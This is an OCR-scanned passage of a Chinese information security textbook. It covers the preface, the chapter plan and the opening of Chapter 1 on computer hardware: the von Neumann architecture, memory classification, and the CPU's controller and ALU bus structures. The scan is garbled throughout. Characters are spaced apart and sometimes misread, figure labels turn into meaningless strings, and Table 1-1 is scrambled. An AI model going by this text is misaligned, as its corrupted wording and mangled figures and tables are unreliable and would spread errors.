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党 的 十 六 届 四 中 全 会 首次 将 信息 安全 列 为 国家 四 大 安全 之 一 。2014 年 
4 月 15 日 ,中 央 网 络 安全 和 信息 化 领导 小 组 宣告 成 立 , 习 近 平 总 书记 在 国家 
安全 委员 会 第 一 次 会 议 上 首次 提出 包括 信息 安全 在 内 的 “11 种 安全 ”所 构成 
的 “总 体 国 家 安全 观 ”, 再 次 将 信息 安全 上 升 到 国家 安全 的 高 度 。 要 把 我 国 
建设 成 为 网 络 强国 ,必须 有 一 支 高 素质 的 信息 安全 人 才 队 伍 。 本 书 正 是 在 
这 种 背景 下 ,结合 编者 多 年 教学 积累 的 经 验 编写 而 成 。 

本 书 从 技术 与 管理 相 结合 的 角度 介绍 信息 安全 ,其 特色 主要 表现 在 以 
下 3 个 方面 。 

(1) 在 学 习 信 息 安全 之 前 ,讲述 计算 机 的 硬件 组 成 及 工作 过 程 ,让 学 生 
明白 计算 机 的 工作 原理 ,为 信息 安全 的 学 习 打 下 坚实 基础 。 

(2) 突出 案例 教学 。 以 某 市 中 小 企业 服务 平台 为 例 ,围绕 其 安全 需求 ， 
逐步 展开 ,贯穿 全 书 , 并 给 出 一 个 完整 的 信息 安全 解决 方案 。 在 学 习 信息 安 
全 概念 、 理 论 .技术 与 管理 方案 的 同时 ,通过 具体 典型 案例 的 分 析 , 使 学 生 加 
深 对 信息 安全 理论 与 技术 的 理解 。 

(3) 讲述 信息 安全 最 新 进展 ,包括 信息 安全 新 技术 和 新 应 用 ,如 量子 密 
码 、 大 数据 安全 与 隐私 保护 、 可 信 计 算 和 互联 网 金融 安全 。 

本 书 是 中 央 财 经 大 学 信息 安全 本 科 专 业 建设 成 果 。 全 书 共 分 为 13 章 。 
计划 总 学 时 为 36 学 时 ,其 中 理论 部 分 为 30 学 时 ,实验 部 分 为 6 学 时 。 每 章 
的 内 容 及 建议 学 时 如 下 。 

第 1 章 , 计 算 机 组 成 原理 ,主要 介绍 计算 机 的 硬件 组 成 和 基本 工作 过 程 
(2 学 时 )。 

第 2 章 ,计算 机 网 络 概述 ,讲述 网 络 组 成 和 体系 结构 (2 学 时 )。 

第 3 章 ,信息 安全 基本 概念 与 原理 ,包括 信息 安全 的 基本 概念 、 基 本 目 
标 ,信息 安全 威胁 和 信息 安全 体系 结构 (2 学 时 )。 

第 4 章 , 密 码 学 ,主要 介绍 密码 体制 的 基本 组 成 分类、 设计 原则 和 攻击 
形式 ,介绍 对 称 密码 体制 、 非 对 称 密码 体制 .Hash 函数 与 消息 认证 、 数 字 签 
名 技术 、 密 钥 管 理 技术 (6 学 时 )。 

第 5 章 , 操 作 系统 安全 ,包括 安全 策略 与 安全 模型 .访问 控制 、 安 全 操作 
系统 评测 (2 学 时 ) 。 

第 6 章 ,物理 安全 ,包括 物理 访问 控制 .生物 识别 、 检 测 和 监控 \ 物 理 隔离 
等 物理 安全 技术 和 环境 、 设 备 、 数 据 、 人 员 等 物理 安全 管理 (2 学 时 )。 


Ne/ 信息 安全 导论 


第 7 章 ,网 络 安全 ,主要 讲述 网 络 安 全 威胁 与 控制 防火墙. 入 侵 检测 系统 、 虚 拟 专 有 
网 VPN、 无 线 网 络 安全 (6 学 时 )。 

第 8 章 ,Web 安全 ,包括 服务 器 安全 、 信 息 探测 与 漏洞 扫描 \XSS 跨 站 脚本 漏洞 、 浏 览 
器 安全 (4 学 时 ) 。 

第 9 章 ,软件 安全 与 恶意 代码 ,包括 软件 缺陷 和 漏洞 ,安全 软件 开发 生命 周期 恶意 代 
码 分析 、 软 件 安全 测试 (2 学 时 )。 

第 10 章 ,信息 内 容 安 全 ,包括 信息 内 容 安全 威胁 来 源 、 体 系 结构 ,信息 内 容 获取 技术 、 
分 析 与 识别 、 控 制 和 管理 ,信息 内 容 安全 应 用 (2 学 时 )。 

第 11 章 ,数据 安全 ,包括 数据 备份 与 恢复 、 云 数据 存储 管理 、 云 数据 安全 (2 学 时 ) 。 

第 12 章 , 信 息 安全 管理 与 审计 ,包括 信息 安全 管理 体系 与 标准 风险 评估 、 信 息 安 全 
审计 (2 学 时 ) 。 

第 13 章 ,信息 安全 技术 的 新 技术 与 应 用 ,包括 量子 密码 、 大 数据 安全 与 隐私 保护 、 可 
信 计 算 技 术 、 互 联网 金融 安全 (2 学 时 )。 

此 外 ,每 章 均 包 括 学 习 要 点 、 本 章 小 结 和 思考 题 ,以 最 大 限度 地 满足 教 与 学 的 需要 。 

本 书 以 编者 丰富 的 学 习 、 工 作 经 历 ,以 及 长 期 在 信息 安全 领域 从 事 科研 与 教学 取得 的 
成 果 为 基础 编写 而 成 。 第 1 章 由 王 茂 光 编写 ;第 2.8、9 章 由 李洋 编写 ;第 3 章 由 朱 建 明 、 
贾 恒 越 编写 ;第 4 章 和 第 13 章 的 量子 密码 由 贾 恒 越 编写 ;第 5 章 由 王 秀 利 编写 ;第 6 章 和 
第 13 章 的 可 信 计 算 技 术 由 段 美 嫌 编写 ;第 7 章 由 王 秀 利 、 段 美 嫌 编写 ;第 10 章 、 第 11 章 
和 第 13 章 的 大 数据 安全 与 隐私 保护 由 高 胜 编写 ;第 12 章 由 朱 建 明 、 高 胜 编写 。 全 书 由 朱 
建明 、 王 秀 利 统筹 全 稿 。 

编者 在 完成 本 书 的 过 程 中 参阅 了 大 量 的 文献 ,其 中 包括 专业 书籍 、 学 术 论文 .学 位 论 
文 、 国 际 标准 、 国 内 标准 和 技术 报告 等 , 书 中 有 部 分 引用 已 经 很 难 查 证 原始 出 处 ,编者 注 明 
的 参考 文献 仅仅 是 获得 相关 资料 的 文献 ,没有 一 一 列举 出 所 有 的 参考 文献 ,在 此 表示 歉意 
和 谢意 。 

感谢 北京 市 教委 共 建 项 目的 支持 。 

由 于 编者 水 平 有 限 ,本 书 不 足 与 疏漏 之 处 在 所 难免 , 敬 请 广大 读者 批评 指正 。 


编 者 
2015 年 8 月 
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第 
计算 机 组 成 原理 


本 章 学 习 要 点 : 

局 计算 机 的 硬件 组 成 

如 计算 机 的 冯 。 诺 依 曼 体 系 结构 ; 
局 计算 机 的 基本 工作 过 程 ; 

名 计算 机 的 硬件 系统 和 软件 系统 ; 
名 计算 机 的 应 用 模式 。 


1.1 计算 机 的 发 展 和 硬件 组 成 


1.11 计算 机 的 发 展 


计算 机 的 产生 是 20 世纪 重大 的 科技 成 果 之 一 ,计算 机 已 广泛 用 于 社会 各 行 各 业 , 正 
在 改变 着 人 类 的 工作 ,学习 与 生活 方式 。 自 1946 年 2 月 世界 上 第 一 台电 子 数 字 计 算 机 
ENIAC 诞生 以 来 ,根据 制造 电子 计算 机 采用 的 物理 器 件 的 不 同 , 可 以 将 计算 机 的 发 展 过 
程 分 成 如 下 四 个 阶段 。 

1. 第 一 代 计 算 机 

第 一 代 计 算 机 (大 约 为 1946 一 1957 年 ) 的 硬件 主要 采用 电子 管 , 一 个 电子 管 的 体积 和 
成 人 一 个 指头 的 体积 近似 ,而 一 台 计 算 机 需要 许多 的 电子 管 。 所 以 ,这 时 的 计算 机 体积 非 
常 庞 大 ,价格 也 很 高 ,运算 速度 每 秒 仅 几 千 次 ;使 用 机 器 语言 与 符号 语言 (汇编 语言 ) 编 写 
程序 。 第 一 代 计算 机 只 能 在 少数 尖端 领域 中 应 用 ,主要 用 于 军事 和 科学 计算 。 

2. 第 二 代 计 算 机 

第 二 代 计 算 机 (大 约 为 1958 一 1964 年 ) 的 硬件 主要 采用 晶体 管 ,采用 磁 芯 作为 存储 
器 ,外 部 设备 采用 磁盘 、 磁 带 ,运算 速度 每 秒 几 十 万 次 。 晶 体 管 的 体积 较 电 子 管 的 体积 小 。 
体积 的 缩小 及 相关 技术 的 发 展 , 带 来 了 计算 机 运算 速度 的 提高 ,存储 容量 的 增 大 , 功 耗 的 
降低 以 及 可 靠 性 的 提高 。 在 软件 方面 提出 了 操作 系统 的 概念 ,开始 使 用 FORTRAN、 
COBOL 、Lisp 等 高 级 程序 语言 。 第 二 代 计 算 机 不 仅 用 于 科学 计算 ,还 用 于 数据 处 理 和 事 
务 处 理 , 并 逐渐 应 用 于 工业 控制 领域 。 

3. 第 三 代 计算 机 

第 三 代 计 算 机 (大 约 为 1965 一 1971 年 ) 的 硬件 主要 采用 中 、 小 规模 集成 电路 ,用 半 导 
体 存储 器 代替 了 磁 芯 存储 器 。 集 成 电路 是 把 若干 个 元 件 集成 在 一 个 指 关节 大 小 的 半导体 
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基 片 上 ,并 进行 封装 ,具有 一 定 功能 的 电子 电路 。 在 这 个 时 期 计算 机 系统 软件 也 有 了 很 大 
发 展 ,出 现 了 操作 系统 和 结构 化 程序 设计 的 方法 。 计 算 机 向 标准 化 、 多 样 化 和 通用 化 方向 
发 展 ,并 开始 应 用 于 各 个 领域 。 

4. 第 四 代 计算 机 

第 四 代 计 算 机 (20 世纪 70 年 代 开 始 ) 的 硬件 主要 采用 大 规模 与 超大 规模 集成 电路 。 
可 以 把 整个 处 理 器 制造 在 一 个 指甲 大 小 的 芯片 上 ,因此 计算 机 的 体系 结构 和 构成 方式 有 
了 很 大 的 发 展 ,出 现 了 个 人 计算 机 (PC)。 计 算 机 的 各 种 性 能 都 得 到 了 大 幅度 的 提高 , 运 
算 速度 从 每 秒 几 百 万 次 到 亿 万 次 以 上 。 操 作 系 统 不 断 完善 ,出 现 了 C 语言 \.C++ 等 语言 , 计 
算 机 软件 产业 高 度 发 展 , 出 现 了 文字 处 理 软件 .电子 制 表 软 件 和 数据 库 管理 系统 ,计算 机 不 
断 进 入 人 们 生产 、 生 活 的 各 个 方面 ,计算 机 的 发 展 逐 渐进 入 了 以 计算 机 网 络 为 特征 的 时 代 。 

自 20 世纪 90 年 代 开始 ,面向 对 象 的 程序 设计 方法 和 万 维 网 (World Wide Web， 
WWW) 开 始 普及 ,Java 语言 开始 流行 。 进 入 21 世纪 ,又 出 现 了 网 格 计算 、 物 联网 和 云 计 
算 等 ,标志 着 计算 机 发 展 进 入 了 一 个 新 的 时 代 。 
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1944 一 1945 年 间 实现 了 数据 和 操作 数据 的 指令 的 逻辑 一 致 性 ,而 且 它 们 能 存储 在 一 
起 ,这 是 计算 机 发 展 史 上 的 一 个 里 程 牌 。 这 个 原理 就 是 著名 的 冯 。 诺 伊 曼 体系 结 构 ,基于 
存储 程序 这 个 原理 的 计算 机 设计 仍然 是 当前 计算 机 的 基础 。 冯 ，。 诺 伊 曼 体系 结构 的 男 一 
个 主要 特征 是 处 理 信息 的 部 件 独立 于 存储 信息 的 部 件 , 这 形成 了 5 个 冯 。 诺 伊 曼 体系 结 
构 的 部 件 , 如 图 1-1 所 示 。 


输入 
设备 


中 央 处 理 器 


控制 器 
算术 逻辑 部 件 


内 存 部 件 


图 1-1 冯 ， 诺 伊 曼 体系 结构 图 


输出 
设备 


EE 
ES 
目 加 


储 设备 


汉 “。 诺 伊 曼 体系 结构 有 5 大 部 件 , 其 中 ,算术 逻辑 部 件 (Arithmetic Logic Unit， 
ALU) 和 控制 部 件 (Control Unit,CU) 合 称 为 中 央 处 理 器 (Central Processing Unit， 
CPU)。 这 5 大 部 件 包括 : 

(1) 存放 数据 和 指令 的 存储 部 件 ,这 里 主要 指 的 是 内 存 部 件 。 

(2) 对 数据 执行 算术 运算 和 逻辑 运算 的 算术 逻辑 部 件 。 

(3) 控制 其 他 部 件 的 动作 ,从 而 执行 指令 序列 的 控制 部 件 。 

(4) 接收 要 存储 在 内 存 中 数据 的 输入 部 件 。 
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(5) 把 存储 在 内 存 中 的 数据 打印 或 显示 出 来 的 输出 部 件 。 
113 存储 器 


存储 器 是 计算 机 的 重要 组 成 部 分 ,分 为 内 存 ( 主 存 ) 部 件 和 外 存 ( 辅 存 ) 部 件 。 当 利用 
计算 机 完成 某 项 任务 时 ,事先 把 解决 问题 的 程序 和 所 需 数据 存 于 存储 器 中 ,在 执行 程序 时 
再 由 存储 器 快速 地 提供 给 处 理 器 。 显 然 , 存 储 器 的 功能 是 存储 信息 ,保存 或 “记忆 ” 解 题 的 
原始 数据 和 解 题 步 又。 不 论 是 数据 ,还 是 解 题 步骤 ,存储 器 存储 的 全 是 0 或 1 表示 的 二 进 
制 代码 。 用 一 个 具有 两 种 稳定 状态 的 物理 器 件 表示 二 进 制 0 和 1, 这 种 器 件 称 为 存储 单 
元 , 它 所 表示 的 是 二 进 制 数 的 一 位 。 位 (bit) 是 二 进 制 数 的 最 基本 单位 ,也 是 存储 器 存储 
信息 的 最 小 单位 。 这 些 位 被 组 合成 8 位 字 节 (Byte) , 字 节 被 组 合成 字 。 一 个 二 进 制 数 由 
若干 位 组 成 , 当 一 个 数 作 为 一 个 整体 存 人 或 读 出 时 ,这 个 数 称 为 存储 字 。 程 序 和 数据 以 二 
进 制 的 形式 存放 在 存储 体 中 , 它 是 存储 器 的 核心 部 分 。 为 了 区 分 存储 体 中 的 所 有 单元 , 必 
须 将 它们 逐一 编号 。 

目前 采用 半导体 器 件 作为 存储 器 ,一 个 半导体 触发 器 可 以 记忆 一 个 二 进 制 代码 ,一 个 
数 若 用 16 位 二 进 制 代码 表示 ,那么 就 需要 有 16 个 触发 器 来 保存 这 些 代 码 。 在 存储 器 中 
保存 一 个 数 的 16 个 触发 器 , 称 为 一 个 存储 单元 。 内 存 是 存储 单元 的 集合 ,每 个 存储 单元 
有 一 个 唯一 的 编号 称 为 地 址 。 存 储 器 所 有 存储 单元 的 总 数 称 为 存储 容量 。 通 常用 单位 
KB、MB、GB 表示 ,如 64KB、128MB、2GB, 一 般 B 指 的 是 字 节 ,b 指 的 是 位 或 比特 。 

存储 体 和 它 周围 的 逻辑 控制 线路 组 成 存储 器 ,从 信息 流通 的 角度 看 ,存储 器 的 基本 结 
构 如 图 1-2 所 示 , 它 由 4 部 分 构成 : 存储 体 、 存 储 器 地 址 寄存 器 、 存 储 器 数据 寄存 器 和 读 / 
写 操作 控制 线路 。 


一 谈 写 指令 


莘 
囊 
六 
杜 小 梧 蔗 明说 


地 址 代码 
图 1-2 存储 器 的 基本 结构 


存储 器 有 两 种 基本 的 操作 : 一 种 是 读 操作 ,一 种 是 写 操作 。 读 操作 是 由 中 央 处 理 器 
将 地 址 加 载 到 地 址 寄存 器 中 ,将 读 命令 加 载 到 读 写 控制 线路 上 ,在 读 命令 的 作用 下 ,存储 
器 将 按照 地 址 寄存 器 中 的 地 址 从 相应 的 存储 单元 中 读 出 内 容 送 到 数据 寄存 器 中 。 写 操作 
是 由 中 央 处 理 器 将 地 址 加 载 到 地 址 寄存 器 中 .将 要 写 的 数据 加 载 到 数据 寄存 器 中 ,然后 将 
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写 命令 加 载 到 读 写 控制 线路 上 ,在 写 命令 的 作用 下 ,存储 器 将 数据 写 入 地 址 寄存 器 所 指定 
的 对 应 单元 中 。 

根据 存储 材料 及 使 用 方法 不 同 ,存储 器 有 多 种 不 同 的 分 类 方法 。 

1. 按 存储 方式 分 类 

(1) 随机 读 写 存储 器 。 随 机 读 写 存储 器 ,简称 RAM, 它 的 任 一 单元 所 用 的 时 间 都 相 
同 , 即 存 取 时 间 和 存储 单元 的 物理 位 置 无 关 。 随 机 读 写 存储 器 的 特点 是 读 写 为 随机 的 , 既 
可 读 出 又 可 写 入 , 存 取 时 间 是 相同 的 ,固定 不 变 的 ,主要 用 作 主 存 ,也 用 作 高 速 缓冲 存储 器 
Cache。 

(2) 只 读 存 储 器 。 只 读 存 储 器 ,简称 ROM, 它 的 特点 是 在 工作 时 只 能 读 出 信息 ,而 不 
能 写 和 新 的 内 容 。 所 以 它 用 来 存放 固定 不 变 的 系统 程序 。 随 着 集成 电路 工艺 发 展 和 用 户 
要 求 ,出现 了 可 编程 只 读 存 储 器 ,简称 PROM。 它 在 制作 时 不 写 入 信息 ,可 由 用 户 在 需要 
时 再 写 人 要 存储 的 内 容 ,一旦 写 入 信息 后 就 不 能 再 改变 了 。 后 来 出 现 了 可 改写 可 编程 只 
读 存储 器 ,简称 EPROML。 

(3) 顺序 存储 器 。 只 能 按 某 种 顺序 来 存 取 , 存 取 时 间 和 存储 单元 的 物理 位 置 有 关 。 
这 种 存储 器 所 存储 的 字 和 记录 块 在 信息 载体 上 没有 唯一 对 应 的 地 址 ,而 是 完全 按 顺 序 进 
行 存放 或 读 出 。 其 特点 是 存储 容量 大 ,价格 低 , 但 存 取 速度 慢 , 因 此 它 只 适合 作 辅 存 。 

(4) 直接 存 取 存储 器 。 直 接 存 取 存储 器 既 不 像 随 机 存 取 器 那样 随机 地 选择 存储 地 址 
进行 存储 ,也 不 像 顺序 存储 器 那样 纯粹 地 顺序 存储 ,而 是 介 于 两 者 之 间 。 当 要 存 取 所 需 的 
信息 时 ,必须 进行 两 步 操作 : 第 一 步 是 直接 指向 整个 存储 器 中 的 一 个 小 区 域 ,第 二 步 紧 接 
着 对 这 个 小 区 域 进行 像 磁带 那样 的 顺序 检索 .计数 或 等 待 一 直 找 到 最 后 的 目的 块 。 这 种 
存储 器 的 存 取 时 间 与 信息 所 在 的 位 置 有 关 , 而 且 同 一 位 置 的 信息 在 不 同时 刻 进行 存 取 的 
时 间 长 短 都 不 同 。 这 种 存储 器 容量 大 、 存 取 速 度 介 于 随机 存 取 和 顺序 存 取 之 间 , 多 用 作 
辅 存 。 

2. 按 信息 的 可 保存 性 分 类 

(1) 非 永久 记忆 的 存储 器 。 非 永久 记忆 的 存储 器 是 断 电 后 信息 即 消失 的 存储 器 。 

(2) 永久 记忆 性 存储 器 。 永 久 记 忆 性 存储 器 是 断 电 后 仍 能 保存 信息 的 存储 器 。 

3. 按 在 计算 机 系统 中 的 作用 分 类 

(1) 高 速 缓冲 存储 器 。 高 速 缓冲 存储 器 通常 位 于 主 存 和 CPU 之 间 , 存 放 当 前 要 执行 
的 程序 段 ,以 便 向 CPU 高 速 提供 马上 要 执行 的 指令 。 高 速 缓冲 存储 器 速度 较 高 ,可 以 与 
CPU 速度 相 匹 配 , 存 取 时 间 为 几 纳 秒 (ns)。 

(2) 主 存储 器 。 主 存储 器 用 来 存放 计算 机 运行 期 间 正 在 执行 的 程序 和 数据 , 存 取 时 
间 可 达 几 个 至 几 十 纳 秒 (ns)。CPU 的 指令 系统 能 直接 读 写 主 存 中 的 存储 单元 , 主 存 是 主 
机 内 部 的 存储 器 , 故 又 称 之 为 内 存 , 主 存 相关 信息 如 表 1-1 所 示 。 

(3) 外 存储 器 。 外 存储 器 也 称 辅助 存储 器 或 后 援 存 储 器 ,主要 包括 硬盘 存储 器 、 光 盘 
存储 器 等 。 它 用 来 存放 系统 程序 ,大 型 数据 文档 等 当前 暂 不 参与 运算 的 大 量 信息 。 外 存 
设 在 主机 外 部 ,容量 极 大 而 速度 较 低 。CPU 不 能 直接 访问 它 , 必 须 通 过 专门 的 程序 把 所 
需要 的 信息 与 主 存 进行 成 批 交换 ,调和 人 主 存 后 才能 使 用 。 描 述 一 个 存储 器 性 能 优 劣 的 主 
要 指标 包括 存储 容量 .存储 周期 和 存 取 时 间 等 。 
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表 1-1 主 存储 句 相关 信息 


指 标 含 义 表 现 单 位 
存储 容量 在 一 个 存储 器 中 可 以 容纳 的 存储 单元 总 数 ”| 存储 空间 的 大 小 字数 , 字 节 数 
从 启动 到 完成 一 次 存储 器 操作 所 经 历 的 


存 取 时 间 。 | 时 上 主 存 的 速度 三 
存储 周期 | 连续 启动 两 次 操作 所 需 的 最 小 间隔 时 间 。 ”| 主 存 的 速度 古 
存储 器 带宽 | 单位 时 间 里 存储 器 所 存 取 的 信息 量 i ti/ Bs 
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当 用 计算 机 解决 某 个 问题 时 ,首先 必须 为 它 编 写 程序 。 程 序 是 一 个 指令 序列 ,这 个 序 
列 明确 告诉 计算 机 应 该 执行 什么 操作 ,在 什么 地 方 找到 用 来 操作 的 数据 。 一 旦 把 程序 装 
入 内 存 , 就 可 以 由 计算 机 来 自动 完成 取出 指令 和 执行 指令 的 任务 。 专 门 用 来 完成 此 项 工 
作 的 计算 机 部 件 称 为 中 央 处 理 器 (Central Processing Unit,CPU)。 中 央 处 理 器 是 控制 器 
和 运算 器 的 总 称 , 它 是 负责 指令 解释 和 执行 的 部 件 。 

1. 控制 器 

控制 器 是 发 布 命令 的 “决策 机 构 ”, 即 协调 和 指挥 整个 计算 机 系统 的 操作 。 由 于 计算 
机 的 类 型 不 同 ,功能 不 同 、 结 构 不 同 以 及 规模 不 同 , 其 控制 器 也 会 有 不 少 差别 ,但 其 基本 组 
成 是 相同 的 ,主要 由 以 下 几 部 分 构成 : 

(1) 程序 计数 器 ,又 称 指令 计数 器 或 指令 地 址 寄存 器 ,用 于 存放 即将 取出 执行 的 指令 
地 址 , 当 该 指令 取出 之 后 ,存放 下 一 条 指令 的 地 址 。 指 令 地 址 的 形成 有 两 种 可 能 : 一 是 顺 
序 执行 的 情况 ,每 执行 一 条 指令 ,程序 计数 器 加 1 以 形成 下 一 条 指令 的 地 址 ;二 是 在 某 些 
条 件 下 ,需要 改变 程序 顺序 执行 的 状态 ,通常 由 转移 指令 形成 转移 地 址 送 到 程序 计数 器 
中 ,作为 下 条 指令 的 地 址 。 

(2) 指令 寄存 器 ,用 以 存放 从 内 存 取 出 来 的 现行 指令 ,以 便 在 整 条 指令 执行 过 程 中 ， 
完成 一 条 指令 的 全 部 功能 控制 。 

(3) 指令 译 码 器 ,又 称 操作 码 译 码 器 , 它 对 指令 寄存 器 中 的 操作 码 进行 分 析 解 释 , 产 
生 相应 的 控制 信号 ,提供 给 操作 控制 信号 形成 部 件 ; 另 外 , 它 还 对 地 址 码 进行 译 码 ,产生 操 
作 数 地 址 所 需要 的 控制 信号 。 

(4) 脉冲 源 及 其 启 停 控制 线路 。 脉 冲 源 产生 一 定 频率 的 脉冲 信号 作为 整个 机 器 的 时 
钟 脉冲 ,是 周期 .节拍 和 工作 脉冲 的 基准 信号 。 启 停 控 制 线路 则 是 在 需要 的 时 候 保证 可 靠 
地 开放 或 封锁 时 钟 脉冲 ,控制 时 序 信号 的 发 生 与 停止 ,实现 对 机 器 的 启动 与 停机 。 

(5) 时 序 信号 产生 部 件 。 计 算 机 之 所 以 能 够 准确 .迅速 有条不紊 地 工作 , 正 是 因为 
存在 一 个 时 序 信 号 产生 器 。 机 器 一 旦 被 启动 , 即 开始 取 指 令 并 执行 指令 时 ,操作 控制 器 就 
利用 定时 脉冲 的 顺序 和 不 同 的 脉冲 间隔 ,有 条 理 、 有 节奏 地 指挥 机 器 的 动作 ,规定 在 脉冲 
到 来 时 做 什么 ,从 而 给 计算 机 各 部 分 提供 工作 所 需 的 时 间 标 志 。 

(6) 操作 控制 信号 形成 部 件 。 该 部 件 产生 命令 的 依据 是 指令 操作 码 、 运 行 状态 、 时 序 
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信号 及 被 控 功 能 部 件 反 馈 的 状态 信号 ,形成 不 同 指令 所 需要 的 操作 控制 信号 序列 。 

(7) 中 断 机 构 。 中 断 机构 是 用 来 控制 中 断 处 理 的 硬件 逻辑 部 件 。 

(8) 总 线 控制 逻辑 。 总 线 控制 逻辑 是 用 以 控制 总 线 数据 传送 的 硬件 逻辑 部 件 。 

计算 机 的 控制 过 程 就 是 程序 执行 的 过 程 。 在 程序 执行 过 程 中 ,计算 机 的 各 个 部 件 在 
控制 器 的 控制 下 协调 地 进行 工作 。 存 储 器 与 控制 器 之 间 的 信息 流动 称 为 指令 流 ,指令 流 
是 算法 的 具体 化 ;存储 器 与 运算 器 之 间 的 信息 流动 称 为 数据 流 ,数据 流 是 被 加 工 处 理 的 对 
象 , 它 受到 指令 流 的 操作 与 控制 。 控 制 器 的 功能 主要 是 对 指令 流 和 数据 流 的 控制 。 

对 指令 流 的 控制 主要 表现 在 : 取 指 令 、 分 析 指 令 与 执行 指令 .控制 指令 流 。 

(1) 取 指 令 : 由 控制 器 向 存储 器 提供 指令 地 址 和 读 命 令 , 存 储 器 接受 地 址 和 读 命令 
后 ,从 地 址 所 对 应 的 存储 单元 中 将 指令 代码 读 出 并 传送 给 控制 器 。 

(2) 分 析 指 令 与 执行 指令 : 控制 器 将 对 指令 流 中 每 条 指令 进行 分 析 , 分 析 指 令 的 操 
作 性 质 、 寻 址 方式 并 形成 操作 数 地 址 。 根 据 分 析 指 令 时 产生 的 操作 命令 和 操作 数 地 址 形 
成 相应 的 操作 控制 信号 序列 ,通过 运算 器 ,存储器 及 输入 输出 设备 的 动作 ,实现 每 条 指令 
的 功能 。 

(3) 控制 指令 流 : 即 下 条 指令 地 址 的 形成 控制 。 通 常 ,指令 是 按 顺 序 执行 的 , 即 执行 
完 第 n 条 指令 , 便 执 行 第 n 十 1 条 指令 ,显然 ,用 程序 计数 器 不 断 加 1 便 可 实现 。 但 是 , 当 
执行 的 指令 是 转移 指令 ,就 会 改变 指令 的 流向 。 另 外 ,对 于 某 些 突 发 事件 进行 紧急 处 理 ， 
如 中 断 处 理 时 ,也 会 改变 指令 的 流向 。 改 变 指令 流向 的 实质 就 是 改变 程序 计数 器 的 内 容 ， 
有 些 情况 下 除了 改变 其 内 容 外 ,还 需要 保留 改变 之 前 的 内 容 , 以 便 返 回 时 使 用 。 

对 数据 流 的 控制 是 指 对 数据 流入 与 流出 施 以 控制 ,对 数据 变换 加 工 等 操作 控制 。 实 
际 上 数据 流 的 流向 是 由 操作 性 质 决定 的 ,不 同 的 操作 性 质 , 不 同 的 寻 址 方式 就 形成 不 同 的 
操作 控制 信号 序列 ,就 会 沟通 不 同 的 数据 通路 ,数据 流动 的 方式 就 不 同 , 实 现 的 操作 也 会 
不 一 样 。 

2. 运算 器 

运算 器 就 好 比 一 个 由 电子 线路 构成 的 算盘 ,能 进行 加 、 减 、 乘 、 除 等 算术 运算 ,还 可 进 
行 与 或, 非 等 逻辑 运算 。 考 虑 到 电子 器 件 的 特性 ,计算 机 通常 采用 二 进 制 数 。 二 进 制 数 
就 是 以 2 为 基数 来 计数 , 即 逢 二 进 一 。 在 二 进 制 中 只 有 0 和 1 两 个 独立 的 数 符 , 而 这 恰好 
能 够 与 电子 器 件 中 电压 的 高 低 、 脉 冲 的 有 无 对 应 起 来 ,容易 实现 。 

二 进 制 数 的 运算 规律 非常 简单 ,在 电子 线路 中 比较 容易 实现 ,而 且 设 备 也 最 省 。 在 运 
算 中 ,二 进 制 数 和 十 进 制 数 一 样 , 当 数 的 位 数 越 多 时 ,计算 的 精度 就 越 高 ,但 是 位 数 越 多 ， 
所 需 的 电子 器 件 也 越 多 。 

运算 器 由 核心 部 件 , 即 算术 逻辑 部 件 (Arithmetic Logic Unit, ALU)、 寄 存 器 
(Register) ,总 线 (Bus) 等 组 成 。 运 算 器 的 设计 主要 是 围绕 逻辑 运算 部 件 (ALU) 和 寄存 器 
同 数据 总 线 之 间 如 何 传送 操作 数 和 运算 结果 进行 的 。 总 线 是 一 组 由 多 个 部 件 分 时 共享 的 
传送 线路 ,共享 是 指 总 线 上 可 以 连接 多 个 部 件 ,它们 之 间 可 以 通过 这 一 组 公共 总 线 传 送信 
息 ; 分 时 是 指 一 组 总 线 在 同一 时 刻 只 能 给 挂 接 在 上 面 的 两 个 部 件 之 间 传 送信 息 ,否则 会 发 
生 冲 突 。 计 算 机 的 运算 器 大 体 有 如 下 3 种 结构 形式 。 

(1) 单 总 线 结构 的 运算 器 。 单 总 线 结构 的 运算 器 把 所 有 部 件 都 接 到 同一 总 线 上 ,所 
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以 数据 可 以 在 任何 两 个 寄存 器 之 间 , 或 者 在 任 一 个 寄存 器 和 ALU 之 间 传送 。 对 这 种 结 
构 的 运算 器 来 说 ,在 同一 时 间 内 ,只 能 有 一 个 操作 数 放 在 单 总 线 上 。 如 果 要 把 两 个 操作 数 
输入 到 ALU, 需 要 分 两 次 来 做 ,而 且 还 需要 两 1 j j 
个 缓冲 寄存 器 A 和 B, 如 图 1-3 所 示 。 例 如 , 执 i 
行 一 次 加 法 操作 : 首先 把 第 一 个 操作 数 经 总 线 
送 入 A 缓冲 寄存 器 ;接着 把 第 二 个 操作 数 经 总 | | 寄存 器 
线 送 入 B 缓冲 寄存 器 ;最 后 ALU 执行 加 法 ,把 T Re 
结果 通过 总 线 送 入 目的 寄存 器 。 
这 种 结构 的 主要 缺点 是 操作 速度 较 慢 。 图 1-3 单 总 线 结构 运算 器 
但 由 于 它 只 控制 一 条 总 线 , 故 控制 电路 比较 
简单 。 
(2) 双 总 线 结构 的 运算 器 。 在 双 总 线 结构 中 ,两 个 操作 数 同时 加 到 ALU 进行 运算 ， 
只 需 一 次 操作 控制 ,而 且 马 上 就 可 以 得 到 运算 结果 。 两 条 总 线 各 自 把 其 数据 送 至 ALU 
的 输入 端 ,如 图 1-4 所 示 。 特 殊 寄 存 器 分 为 两 组 ,它们 分 别 与 一 条 总 线 交换 数据 。 这 样 ， 
通用 寄存 器 中 的 数据 就 可 进入 到 任 一 组 特殊 寄存 器 中 去 ,从 而 使 数据 传送 更 为 灵活 。 
ALU 的 输出 不 能 直接 加 到 总 线 上 去 ,这 是 因为 , 当 形成 操作 结果 输出 时 ,两 条 总 线 部 被 输 
入 数据 占据 ,因而 必须 在 ALU 输出 端 设 置 缓冲 寄存 器 。 例 如 ,执行 一 次 加 法 操作 的 控制 
要 分 两 步 完成 : 首先 ,在 ALU 的 两 个 输入 端 输入 操作 数 ,形成 结果 并 送 入 缓冲 寄存 器 ;其 
次 ,把 结果 送 入 目的 寄存 器 。 


| | 总 线 1 


通用 
寄存 器 


缓冲 器 


图 1-4 双 总 线 结构 运算 器 


(3) 三 总 线 结构 运算 器 。 在 三 总 线 结构 的 运算 器 中 ,ALU 的 两 个 输入 端 分 别 由 两 条 
总 线 供给 ,而 ALU 的 输出 则 与 第 三 条 总 线 相 连 , 如 图 1-5 所 示 。 这 样 ,算术 逻辑 操作 就 可 
以 在 一 步 控制 之 内 完成 。 另 外 ,设置 了 一 个 总 线 旁 路 器 。 设 置 总 线 旁 路 器 的 目的 是 : 如 
